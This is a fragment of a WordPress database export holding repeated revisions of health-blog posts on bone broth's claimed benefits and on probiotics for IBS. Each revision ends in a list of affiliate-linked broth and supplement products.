  3. Satiety and Reduced Caloric Intake: One of the key factors contributing to weight loss is the ability to control appetite. The gelatin in bone broth has been shown to promote feelings of fullness, reducing the likelihood of overeating. Additionally, sipping on a warm cup of broth before a meal may lead to consuming fewer calories during the main course, ultimately aiding in weight management.
  4. \n\n\n\n
  5. Metabolism Boost: Amino acids present in bone broth, such as glycine and proline, play a role in supporting metabolic function. By enhancing the efficiency of nutrient absorption and utilization, bone broth may contribute to a more effective metabolism, potentially assisting in weight loss efforts.
  6. \n\n\n\n
  7. Gut Health and Reduced Inflammation: A healthy gut is crucial for overall well-being and can have a significant impact on weight regulation. Bone broth contains compounds that support gut health, including glutamine, which is known for its role in maintaining the integrity of the intestinal lining. A healthier gut can contribute to reduced inflammation, a factor associated with weight gain.
  8. \n\n\n\n
  9. Hydration and Detoxification: Staying adequately hydrated is fundamental to any weight loss journey. Bone broth is an excellent source of hydration and can be a flavorful alternative to plain water. Furthermore, the nutrients in bone broth may support the body\'s natural detoxification processes, assisting in the elimination of waste and potentially aiding in weight loss.

    While bone broth is not a magical solution for weight loss, its nutrient-rich composition and potential benefits for satiety, metabolism, and gut health make it a valuable addition to a well-rounded and healthy diet. As with any dietary change, it\'s essential to incorporate bone broth into an overall balanced lifestyle that includes regular exercise and a variety of nutrient-dense foods. So, the next time you sip on a comforting cup of bone broth, know that you may be nourishing your body in more ways than one, supporting both your taste buds and your weight loss goals.
  10. \n
\n\n\n\n

Chick HERE for a Chicken and Beef Bone Broth recipe OR You can buy these Bone Broths online by following the links :

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.
TOP 5 READY MADE BONE BROTH AVAILABLE ONLINE

\n\n\n\n

Chicken Bone Broth Soup by Kettle and Fire, Keto Diet, Paleo Friendly, Gluten Free, 16.9 Ounce (Pack of 6)

\n\n\n\n\"\"\n\n\n\n

Bare Bones Bone Broth Instant Powdered Mix, Beef, Pack of 16, 15g Sticks, 10g Protein, 100% Grass Fed, Keto & Paleo Friendly Bone Broth Packets

\n\n\n\n\"\"\n\n\n\n


Dr. Kellyann Bone Broth Packets, Original Homestyle Flavor - 7 Servings, Chicken Broth with 100% Grass-fed Hydrolyzed Collagen Peptides Powder, 16g Protein, Keto and Paleo Diet Friendly

\n\n\n\n\"\"\n\n\n\n

Kitchen Basics Original Chicken Bone Broth, 8.25 oz (Pack of 12)

\n\n\n\n\"\"\n\n\n\n

Pacific Foods Organic Chicken Bone Broth, 8oz (Pack of 12)

\n\n\n\n\"\"\n','The Hidden Elixir: Bone Broth and Its Surprising Role in Weight Loss','','inherit','closed','closed','','5724-revision-v1','','','2023-10-11 16:24:40','2023-10-11 16:24:40','',5724,'https://tummyrevolution.com/?p=5729',0,'revision','',0),(5730,1,'2023-10-12 05:39:57','2023-10-12 05:39:57','\n

Bone broth is touted for its potential health benefits due to its rich nutritional profile. Here are some ways bone broth may positively impact your body:
(Skip to Top 5 Bone Broths available online HERE)

\n\n\n\n
    \n
  1. Provides Essential Nutrients: Bone broth is made by simmering animal bones, connective tissues, and herbs. This process extracts essential nutrients, including collagen, gelatin, amino acids, minerals (such as calcium, magnesium, and phosphorus), and other compounds. These nutrients contribute to overall health and well-being.
  2. \n\n\n\n
  3. Supports Joint Health: Collagen, a protein abundant in bone broth, is a key component of connective tissues in the body, including joints. Consuming collagen-rich bone broth may help support joint health and potentially alleviate symptoms of conditions like osteoarthritis.
  4. \n\n\n\n
  5. Aids Digestive Health: The gelatin in bone broth may support digestive health by promoting the integrity of the gut lining. This can be beneficial for individuals with conditions like leaky gut syndrome. Additionally, the amino acids in bone broth, such as glycine and glutamine, may contribute to a healthy digestive system.
  6. \n\n\n\n
  7. May Boost the Immune System: The amino acids and minerals in bone broth, along with its potential anti-inflammatory effects, may contribute to a strengthened immune system. The nutrients in bone broth can support the production of immune cells and help the body defend against infections.
  8. \n\n\n\n
  9. Promotes Hydration: Bone broth is a liquid, and consuming it contributes to hydration. Staying adequately hydrated is essential for various bodily functions, including digestion, circulation, and temperature regulation.
  10. \n\n\n\n
  11. Supports Skin Health: Collagen is not only beneficial for joints but also for the skin. Consuming collagen-rich bone broth may contribute to improved skin elasticity and hydration, potentially reducing the appearance of wrinkles and promoting a more youthful complexion.
  12. \n\n\n\n
  13. A Source of Electrolytes: Bone broth contains minerals like potassium, sodium, and magnesium, which are essential electrolytes. These electrolytes play a crucial role in maintaining fluid balance, nerve function, and muscle contractions.
  14. \n\n\n\n
  15. May Aid Weight Loss: Some studies suggest that the protein content in bone broth, particularly gelatin, may promote feelings of fullness and satiety. Including bone broth in your diet may help control appetite and reduce overall calorie intake.
  16. \n
\n\n\n\n

It\'s important to note that while bone broth has potential health benefits, it should not be considered a cure-all, and its effects can vary among individuals. Moreover, the quality of the ingredients and the preparation method can influence the nutritional content of the broth. As with any dietary changes, it\'s advisable to consult with a healthcare professional or nutritionist for personalized advice based on your specific health needs and goals.

\n\n\n\n

Chick HERE for a Chicken and Beef Bone Broth recipe OR You can buy these Bone Broths online by following the links :

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.
TOP 5 BONE BROTH AVAILABLE ONLINE

\n\n\n\n

Chicken Bone Broth Soup by Kettle and Fire, Keto Diet, Paleo Friendly, Gluten Free, 16.9 Ounce (Pack of 6)

\n\n\n\n\"\"\n\n\n\n

Bare Bones Bone Broth Instant Powdered Mix, Beef, Pack of 16, 15g Sticks, 10g Protein, 100% Grass Fed, Keto & Paleo Friendly Bone Broth Packets

\n\n\n\n\"\"\n\n\n\n


Dr. Kellyann Bone Broth Packets, Original Homestyle Flavor - 7 Servings, Chicken Broth with 100% Grass-fed Hydrolyzed Collagen Peptides Powder, 16g Protein, Keto and Paleo Diet Friendly

\n\n\n\n\"\"\n\n\n\n

Kitchen Basics Original Chicken Bone Broth, 8.25 oz (Pack of 12)

\n\n\n\n\"\"\n\n\n\n

Pacific Foods Organic Chicken Bone Broth, 8oz (Pack of 12)

\n\n\n\n\"\"\n','What does Bone Broth do to your Body','','publish','open','open','','what-does-bone-broth-do-to-your-body','','','2023-10-12 05:39:59','2023-10-12 05:39:59','',0,'https://tummyrevolution.com/?p=5730',0,'post','',0),(5731,1,'2023-10-11 16:55:20','2023-10-11 16:55:20','How does bone broth effect the body\nBenefits of Bone Broth','Bone Broth top 5','Improve your heath with bone broth - top 5\n','inherit','open','closed','','bluebird-provisions-ufou8qa4mlo-unsplash','','','2023-10-11 16:57:48','2023-10-11 16:57:48','',5730,'http://tummyrevolution.com/wp-content/uploads/2023/10/bluebird-provisions-Ufou8QA4mlo-unsplash.jpg',0,'attachment','image/jpeg',0),(5732,1,'2023-10-11 16:57:53','2023-10-11 16:57:53','\n

Bone broth is touted for its potential health benefits due to its rich nutritional profile. Here are some ways bone broth may positively impact your body:

\n\n\n\n
    \n
  1. Provides Essential Nutrients: Bone broth is made by simmering animal bones, connective tissues, and herbs. This process extracts essential nutrients, including collagen, gelatin, amino acids, minerals (such as calcium, magnesium, and phosphorus), and other compounds. These nutrients contribute to overall health and well-being.
  2. \n\n\n\n
  3. Supports Joint Health: Collagen, a protein abundant in bone broth, is a key component of connective tissues in the body, including joints. Consuming collagen-rich bone broth may help support joint health and potentially alleviate symptoms of conditions like osteoarthritis.
  4. \n\n\n\n
  5. Aids Digestive Health: The gelatin in bone broth may support digestive health by promoting the integrity of the gut lining. This can be beneficial for individuals with conditions like leaky gut syndrome. Additionally, the amino acids in bone broth, such as glycine and glutamine, may contribute to a healthy digestive system.
  6. \n\n\n\n
  7. May Boost the Immune System: The amino acids and minerals in bone broth, along with its potential anti-inflammatory effects, may contribute to a strengthened immune system. The nutrients in bone broth can support the production of immune cells and help the body defend against infections.
  8. \n\n\n\n
  9. Promotes Hydration: Bone broth is a liquid, and consuming it contributes to hydration. Staying adequately hydrated is essential for various bodily functions, including digestion, circulation, and temperature regulation.
  10. \n\n\n\n
  11. Supports Skin Health: Collagen is not only beneficial for joints but also for the skin. Consuming collagen-rich bone broth may contribute to improved skin elasticity and hydration, potentially reducing the appearance of wrinkles and promoting a more youthful complexion.
  12. \n\n\n\n
  13. A Source of Electrolytes: Bone broth contains minerals like potassium, sodium, and magnesium, which are essential electrolytes. These electrolytes play a crucial role in maintaining fluid balance, nerve function, and muscle contractions.
  14. \n\n\n\n
  15. May Aid Weight Loss: Some studies suggest that the protein content in bone broth, particularly gelatin, may promote feelings of fullness and satiety. Including bone broth in your diet may help control appetite and reduce overall calorie intake.
  16. \n
\n\n\n\n

It\'s important to note that while bone broth has potential health benefits, it should not be considered a cure-all, and its effects can vary among individuals. Moreover, the quality of the ingredients and the preparation method can influence the nutritional content of the broth. As with any dietary changes, it\'s advisable to consult with a healthcare professional or nutritionist for personalized advice based on your specific health needs and goals.

\n\n\n\n

Chick HERE for a Chicken and Beef Bone Broth recipe OR You can buy these Bone Broths online by following the links :

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.
TOP 5 READY MADE BONE BROTH AVAILABLE ONLINE

\n\n\n\n

Chicken Bone Broth Soup by Kettle and Fire, Keto Diet, Paleo Friendly, Gluten Free, 16.9 Ounce (Pack of 6)

\n\n\n\n\"\"\n\n\n\n

Bare Bones Bone Broth Instant Powdered Mix, Beef, Pack of 16, 15g Sticks, 10g Protein, 100% Grass Fed, Keto & Paleo Friendly Bone Broth Packets

\n\n\n\n\"\"\n\n\n\n


Dr. Kellyann Bone Broth Packets, Original Homestyle Flavor - 7 Servings, Chicken Broth with 100% Grass-fed Hydrolyzed Collagen Peptides Powder, 16g Protein, Keto and Paleo Diet Friendly

\n\n\n\n\"\"\n\n\n\n

Kitchen Basics Original Chicken Bone Broth, 8.25 oz (Pack of 12)

\n\n\n\n\"\"\n\n\n\n

Pacific Foods Organic Chicken Bone Broth, 8oz (Pack of 12)

\n\n\n\n\"\"\n','What does Bone Broth do to your Body','','inherit','closed','closed','','5730-revision-v1','','','2023-10-11 16:57:53','2023-10-11 16:57:53','',5730,'https://tummyrevolution.com/?p=5732',0,'revision','',0),(5734,1,'2023-10-12 05:39:57','2023-10-12 05:39:57','\n

Bone broth is touted for its potential health benefits due to its rich nutritional profile. Here are some ways bone broth may positively impact your body:
(Skip to Top 5 Bone Broths available online HERE)

\n\n\n\n
    \n
  1. Provides Essential Nutrients: Bone broth is made by simmering animal bones, connective tissues, and herbs. This process extracts essential nutrients, including collagen, gelatin, amino acids, minerals (such as calcium, magnesium, and phosphorus), and other compounds. These nutrients contribute to overall health and well-being.
  2. \n\n\n\n
  3. Supports Joint Health: Collagen, a protein abundant in bone broth, is a key component of connective tissues in the body, including joints. Consuming collagen-rich bone broth may help support joint health and potentially alleviate symptoms of conditions like osteoarthritis.
  4. \n\n\n\n
  5. Aids Digestive Health: The gelatin in bone broth may support digestive health by promoting the integrity of the gut lining. This can be beneficial for individuals with conditions like leaky gut syndrome. Additionally, the amino acids in bone broth, such as glycine and glutamine, may contribute to a healthy digestive system.
  6. \n\n\n\n
  7. May Boost the Immune System: The amino acids and minerals in bone broth, along with its potential anti-inflammatory effects, may contribute to a strengthened immune system. The nutrients in bone broth can support the production of immune cells and help the body defend against infections.
  8. \n\n\n\n
  9. Promotes Hydration: Bone broth is a liquid, and consuming it contributes to hydration. Staying adequately hydrated is essential for various bodily functions, including digestion, circulation, and temperature regulation.
  10. \n\n\n\n
  11. Supports Skin Health: Collagen is not only beneficial for joints but also for the skin. Consuming collagen-rich bone broth may contribute to improved skin elasticity and hydration, potentially reducing the appearance of wrinkles and promoting a more youthful complexion.
  12. \n\n\n\n
  13. A Source of Electrolytes: Bone broth contains minerals like potassium, sodium, and magnesium, which are essential electrolytes. These electrolytes play a crucial role in maintaining fluid balance, nerve function, and muscle contractions.
  14. \n\n\n\n
  15. May Aid Weight Loss: Some studies suggest that the protein content in bone broth, particularly gelatin, may promote feelings of fullness and satiety. Including bone broth in your diet may help control appetite and reduce overall calorie intake.
  16. \n
\n\n\n\n

It\'s important to note that while bone broth has potential health benefits, it should not be considered a cure-all, and its effects can vary among individuals. Moreover, the quality of the ingredients and the preparation method can influence the nutritional content of the broth. As with any dietary changes, it\'s advisable to consult with a healthcare professional or nutritionist for personalized advice based on your specific health needs and goals.

\n\n\n\n

Chick HERE for a Chicken and Beef Bone Broth recipe OR You can buy these Bone Broths online by following the links :

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.
TOP 5 BONE BROTH AVAILABLE ONLINE

\n\n\n\n

Chicken Bone Broth Soup by Kettle and Fire, Keto Diet, Paleo Friendly, Gluten Free, 16.9 Ounce (Pack of 6)

\n\n\n\n\"\"\n\n\n\n

Bare Bones Bone Broth Instant Powdered Mix, Beef, Pack of 16, 15g Sticks, 10g Protein, 100% Grass Fed, Keto & Paleo Friendly Bone Broth Packets

\n\n\n\n\"\"\n\n\n\n


Dr. Kellyann Bone Broth Packets, Original Homestyle Flavor - 7 Servings, Chicken Broth with 100% Grass-fed Hydrolyzed Collagen Peptides Powder, 16g Protein, Keto and Paleo Diet Friendly

\n\n\n\n\"\"\n\n\n\n

Kitchen Basics Original Chicken Bone Broth, 8.25 oz (Pack of 12)

\n\n\n\n\"\"\n\n\n\n

Pacific Foods Organic Chicken Bone Broth, 8oz (Pack of 12)

\n\n\n\n\"\"\n','What does Bone Broth do to your Body','','inherit','closed','closed','','5730-revision-v1','','','2023-10-12 05:39:57','2023-10-12 05:39:57','',5730,'https://tummyrevolution.com/?p=5734',0,'revision','',0),(5735,1,'2023-10-12 06:39:17','2023-10-12 06:39:17','\n

Irritable Bowel Syndrome (IBS) is a common gastrointestinal disorder that can lead to symptoms like abdominal pain, bloating, gas, and changes in bowel habits. While the effectiveness of probiotics in managing IBS can vary from person to person, some probiotic strains have shown promise in alleviating symptoms. Here are five probiotics that are often recommended for individuals with IBS:

\n\n\n\n
    \n
  1. Bifidobacterium Infantis: B. infantis is known for its ability to help rebalance gut microbiota and improve symptoms of IBS, particularly those with diarrhea-predominant IBS (IBS-D). It may help reduce abdominal pain, bloating, and improve stool consistency.
  2. \n\n\n\n
  3. Lactobacillus Plantarum: This strain has demonstrated anti-inflammatory properties and can help regulate gut motility. It has been studied for its potential to alleviate symptoms in various types of IBS.
  4. \n\n\n\n
  5. Lactobacillus Acidophilus: L. acidophilus can help restore balance to the gut microbiota and promote better digestion. It\'s commonly found in fermented foods and yogurt.
  6. \n\n\n\n
  7. Bifidobacterium Longum: B. longum has been shown to have positive effects on gut health and may help reduce symptoms of IBS, including bloating and discomfort.
  8. \n\n\n\n
  9. Lactobacillus Rhamnosus GG: This strain is well-researched and has shown promise in managing IBS symptoms, especially in those with irritable bowel syndrome with constipation (IBS-C) and IBS-D.
  10. \n
\n\n\n\n

When selecting a probiotic for IBS, keep in mind that the specific formulation and dosage can matter. Also, different people might respond better to different strains. It\'s advisable to consult with a healthcare professional before starting any new supplement, especially if you have a medical condition or are taking other medications.

\n\n\n\n

Additionally, the effectiveness of probiotics in managing IBS can be influenced by various factors, including the severity of your symptoms, the underlying causes of your IBS, and your overall health. It may take some time to find the right probiotic and dosage that works best for you.

\n\n\n\n

As research in this area is ongoing, it\'s a good idea to stay informed about the latest scientific developments related to probiotics and IBS. Keep an eye out for clinical studies and evidence-based recommendations to make the most informed decisions for your health.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n','Finding Relief, The Top Probiotics for IBS','','inherit','closed','closed','','5551-revision-v1','','','2023-10-12 06:39:17','2023-10-12 06:39:17','',5551,'https://tummyrevolution.com/?p=5735',0,'revision','',0),(5736,1,'2023-10-12 06:42:48','2023-10-12 06:42:48','\n

Irritable Bowel Syndrome (IBS) is a common gastrointestinal disorder that can lead to symptoms like abdominal pain, bloating, gas, and changes in bowel habits. While the effectiveness of probiotics in managing IBS can vary from person to person, some probiotic strains have shown promise in alleviating symptoms. Here are five probiotics that are often recommended for individuals with IBS:

\n\n\n\n
    \n
  1. Bifidobacterium Infantis: B. infantis is known for its ability to help rebalance gut microbiota and improve symptoms of IBS, particularly those with diarrhea-predominant IBS (IBS-D). It may help reduce abdominal pain, bloating, and improve stool consistency.
  2. \n\n\n\n
  3. Lactobacillus Plantarum: This strain has demonstrated anti-inflammatory properties and can help regulate gut motility. It has been studied for its potential to alleviate symptoms in various types of IBS.
  4. \n\n\n\n
  5. Lactobacillus Acidophilus: L. acidophilus can help restore balance to the gut microbiota and promote better digestion. It\'s commonly found in fermented foods and yogurt.
  6. \n\n\n\n
  7. Bifidobacterium Longum: B. longum has been shown to have positive effects on gut health and may help reduce symptoms of IBS, including bloating and discomfort.
  8. \n\n\n\n
  9. Lactobacillus Rhamnosus GG: This strain is well-researched and has shown promise in managing IBS symptoms, especially in those with irritable bowel syndrome with constipation (IBS-C) and IBS-D.
  10. \n
\n\n\n\n

When selecting a probiotic for IBS, keep in mind that the specific formulation and dosage can matter. Also, different people might respond better to different strains. It\'s advisable to consult with a healthcare professional before starting any new supplement, especially if you have a medical condition or are taking other medications.

\n\n\n\n

Additionally, the effectiveness of probiotics in managing IBS can be influenced by various factors, including the severity of your symptoms, the underlying causes of your IBS, and your overall health. It may take some time to find the right probiotic and dosage that works best for you.

\n\n\n\n

As research in this area is ongoing, it\'s a good idea to stay informed about the latest scientific developments related to probiotics and IBS. Keep an eye out for clinical studies and evidence-based recommendations to make the most informed decisions for your health.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n\n\n\n

Culturelle Pro Strength Daily Probiotic, Digestive Health Capsules, Supports Occasional Diarrhea, Gas & Bloating, Gluten and Soy Free, 60 Count

\n\n\n\n\"\"\n','Finding Relief, The Top Probiotics for IBS','','inherit','closed','closed','','5551-revision-v1','','','2023-10-12 06:42:48','2023-10-12 06:42:48','',5551,'https://tummyrevolution.com/?p=5736',0,'revision','',0),(5737,1,'2023-10-12 06:48:18','2023-10-12 06:48:18','\n

Irritable Bowel Syndrome (IBS) is a common gastrointestinal disorder that can lead to symptoms like abdominal pain, bloating, gas, and changes in bowel habits. While the effectiveness of probiotics in managing IBS can vary from person to person, some probiotic strains have shown promise in alleviating symptoms. Here are five probiotics that are often recommended for individuals with IBS:

\n\n\n\n
    \n
  1. Bifidobacterium Infantis: B. infantis is known for its ability to help rebalance gut microbiota and improve symptoms of IBS, particularly those with diarrhea-predominant IBS (IBS-D). It may help reduce abdominal pain, bloating, and improve stool consistency.
  2. \n\n\n\n
  3. Lactobacillus Plantarum: This strain has demonstrated anti-inflammatory properties and can help regulate gut motility. It has been studied for its potential to alleviate symptoms in various types of IBS.
  4. \n\n\n\n
  5. Lactobacillus Acidophilus: L. acidophilus can help restore balance to the gut microbiota and promote better digestion. It\'s commonly found in fermented foods and yogurt.
  6. \n\n\n\n
  7. Bifidobacterium Longum: B. longum has been shown to have positive effects on gut health and may help reduce symptoms of IBS, including bloating and discomfort.
  8. \n\n\n\n
  9. Lactobacillus Rhamnosus GG: This strain is well-researched and has shown promise in managing IBS symptoms, especially in those with irritable bowel syndrome with constipation (IBS-C) and IBS-D.
  10. \n
\n\n\n\n

When selecting a probiotic for IBS, keep in mind that the specific formulation and dosage can matter. Also, different people might respond better to different strains. It\'s advisable to consult with a healthcare professional before starting any new supplement, especially if you have a medical condition or are taking other medications.

\n\n\n\n

Additionally, the effectiveness of probiotics in managing IBS can be influenced by various factors, including the severity of your symptoms, the underlying causes of your IBS, and your overall health. It may take some time to find the right probiotic and dosage that works best for you.

\n\n\n\n

As research in this area is ongoing, it\'s a good idea to stay informed about the latest scientific developments related to probiotics and IBS. Keep an eye out for clinical studies and evidence-based recommendations to make the most informed decisions for your health.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n\n\n\n

Culturelle Pro Strength Daily Probiotic, Digestive Health Capsules, Supports Occasional Diarrhea, Gas & Bloating, Gluten and Soy Free, 60 Count

\n\n\n\n\"\"\n\n\n\n

Probiotics for IBS if your primary symptoms are Constipation:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n','Finding Relief, The Top Probiotics for IBS','','inherit','closed','closed','','5551-revision-v1','','','2023-10-12 06:48:18','2023-10-12 06:48:18','',5551,'https://tummyrevolution.com/?p=5737',0,'revision','',0),(5738,1,'2023-10-12 06:54:35','2023-10-12 06:54:35','\n

Irritable Bowel Syndrome (IBS) is a common gastrointestinal disorder that can lead to symptoms like abdominal pain, bloating, gas, and changes in bowel habits. While the effectiveness of probiotics in managing IBS can vary from person to person, some probiotic strains have shown promise in alleviating symptoms. Here are five probiotics that are often recommended for individuals with IBS:

\n\n\n\n
    \n
  1. Bifidobacterium Infantis: B. infantis is known for its ability to help rebalance gut microbiota and improve symptoms of IBS, particularly those with diarrhea-predominant IBS (IBS-D). It may help reduce abdominal pain, bloating, and improve stool consistency.
  2. \n\n\n\n
  3. Lactobacillus Plantarum: This strain has demonstrated anti-inflammatory properties and can help regulate gut motility. It has been studied for its potential to alleviate symptoms in various types of IBS.
  4. \n\n\n\n
  5. Lactobacillus Acidophilus: L. acidophilus can help restore balance to the gut microbiota and promote better digestion. It\'s commonly found in fermented foods and yogurt.
  6. \n\n\n\n
  7. Bifidobacterium Longum: B. longum has been shown to have positive effects on gut health and may help reduce symptoms of IBS, including bloating and discomfort.
  8. \n\n\n\n
  9. Lactobacillus Rhamnosus GG: This strain is well-researched and has shown promise in managing IBS symptoms, especially in those with irritable bowel syndrome with constipation (IBS-C) and IBS-D.
  10. \n
\n\n\n\n

When selecting a probiotic for IBS, keep in mind that the specific formulation and dosage can matter. Also, different people might respond better to different strains. It\'s advisable to consult with a healthcare professional before starting any new supplement, especially if you have a medical condition or are taking other medications.

\n\n\n\n

Additionally, the effectiveness of probiotics in managing IBS can be influenced by various factors, including the severity of your symptoms, the underlying causes of your IBS, and your overall health. It may take some time to find the right probiotic and dosage that works best for you.

\n\n\n\n

As research in this area is ongoing, it\'s a good idea to stay informed about the latest scientific developments related to probiotics and IBS. Keep an eye out for clinical studies and evidence-based recommendations to make the most informed decisions for your health.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n\n\n\n

Culturelle Pro Strength Daily Probiotic, Digestive Health Capsules, Supports Occasional Diarrhea, Gas & Bloating, Gluten and Soy Free, 60 Count

\n\n\n\n\"\"\n\n\n\n

Probiotics for IBS if your primary symptoms are Constipation:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n','Finding Relief, The Top Probiotics for IBS','','inherit','closed','closed','','5551-revision-v1','','','2023-10-12 06:54:35','2023-10-12 06:54:35','',5551,'https://tummyrevolution.com/?p=5738',0,'revision','',0),(5739,1,'2023-10-12 06:59:10','2023-10-12 06:59:10','\n

Irritable Bowel Syndrome (IBS) is a common gastrointestinal disorder that can lead to symptoms like abdominal pain, bloating, gas, and changes in bowel habits. While the effectiveness of probiotics in managing IBS can vary from person to person, some probiotic strains have shown promise in alleviating symptoms. Here are five probiotics that are often recommended for individuals with IBS:

\n\n\n\n
    \n
  1. Bifidobacterium Infantis: B. infantis is known for its ability to help rebalance gut microbiota and improve symptoms of IBS, particularly those with diarrhea-predominant IBS (IBS-D). It may help reduce abdominal pain, bloating, and improve stool consistency.
  2. \n\n\n\n
  3. Lactobacillus Plantarum: This strain has demonstrated anti-inflammatory properties and can help regulate gut motility. It has been studied for its potential to alleviate symptoms in various types of IBS.
  4. \n\n\n\n
  5. Lactobacillus Acidophilus: L. acidophilus can help restore balance to the gut microbiota and promote better digestion. It\'s commonly found in fermented foods and yogurt.
  6. \n\n\n\n
  7. Bifidobacterium Longum: B. longum has been shown to have positive effects on gut health and may help reduce symptoms of IBS, including bloating and discomfort.
  8. \n\n\n\n
  9. Lactobacillus Rhamnosus GG: This strain is well-researched and has shown promise in managing IBS symptoms, especially in those with irritable bowel syndrome with constipation (IBS-C) and IBS-D.
  10. \n
\n\n\n\n

When selecting a probiotic for IBS, keep in mind that the specific formulation and dosage can matter. Also, different people might respond better to different strains. It\'s advisable to consult with a healthcare professional before starting any new supplement, especially if you have a medical condition or are taking other medications.

\n\n\n\n

Additionally, the effectiveness of probiotics in managing IBS can be influenced by various factors, including the severity of your symptoms, the underlying causes of your IBS, and your overall health. It may take some time to find the right probiotic and dosage that works best for you.

\n\n\n\n

As research in this area is ongoing, it\'s a good idea to stay informed about the latest scientific developments related to probiotics and IBS. Keep an eye out for clinical studies and evidence-based recommendations to make the most informed decisions for your health.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n\n\n\n

Culturelle Pro Strength Daily Probiotic, Digestive Health Capsules, Supports Occasional Diarrhea, Gas & Bloating, Gluten and Soy Free, 60 Count

\n\n\n\n\"\"\n\n\n\n

Probiotics for IBS if your primary symptoms are Constipation:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

Probiotics for IBS if you have mixed symptoms (bloating, gas, diarrhoea, constipation)

\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n','Finding Relief, The Top Probiotics for IBS','','inherit','closed','closed','','5551-revision-v1','','','2023-10-12 06:59:10','2023-10-12 06:59:10','',5551,'https://tummyrevolution.com/?p=5739',0,'revision','',0),(5740,1,'2023-10-12 07:02:18','2023-10-12 07:02:18','\n

Irritable Bowel Syndrome (IBS) is a common gastrointestinal disorder that can lead to symptoms like abdominal pain, bloating, gas, and changes in bowel habits. While the effectiveness of probiotics in managing IBS can vary from person to person, some probiotic strains have shown promise in alleviating symptoms. Here are five probiotics that are often recommended for individuals with IBS:

\n\n\n\n
    \n
  1. Bifidobacterium Infantis: B. infantis is known for its ability to help rebalance gut microbiota and improve symptoms of IBS, particularly those with diarrhea-predominant IBS (IBS-D). It may help reduce abdominal pain, bloating, and improve stool consistency.
  2. \n\n\n\n
  3. Lactobacillus Plantarum: This strain has demonstrated anti-inflammatory properties and can help regulate gut motility. It has been studied for its potential to alleviate symptoms in various types of IBS.
  4. \n\n\n\n
  5. Lactobacillus Acidophilus: L. acidophilus can help restore balance to the gut microbiota and promote better digestion. It\'s commonly found in fermented foods and yogurt.
  6. \n\n\n\n
  7. Bifidobacterium Longum: B. longum has been shown to have positive effects on gut health and may help reduce symptoms of IBS, including bloating and discomfort.
  8. \n\n\n\n
  9. Lactobacillus Rhamnosus GG: This strain is well-researched and has shown promise in managing IBS symptoms, especially in those with irritable bowel syndrome with constipation (IBS-C) and IBS-D.
  10. \n
\n\n\n\n

When selecting a probiotic for IBS, keep in mind that the specific formulation and dosage can matter. Also, different people might respond better to different strains. It\'s advisable to consult with a healthcare professional before starting any new supplement, especially if you have a medical condition or are taking other medications.

\n\n\n\n

Additionally, the effectiveness of probiotics in managing IBS can be influenced by various factors, including the severity of your symptoms, the underlying causes of your IBS, and your overall health. It may take some time to find the right probiotic and dosage that works best for you.

\n\n\n\n

As research in this area is ongoing, it\'s a good idea to stay informed about the latest scientific developments related to probiotics and IBS. Keep an eye out for clinical studies and evidence-based recommendations to make the most informed decisions for your health.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n\n\n\n

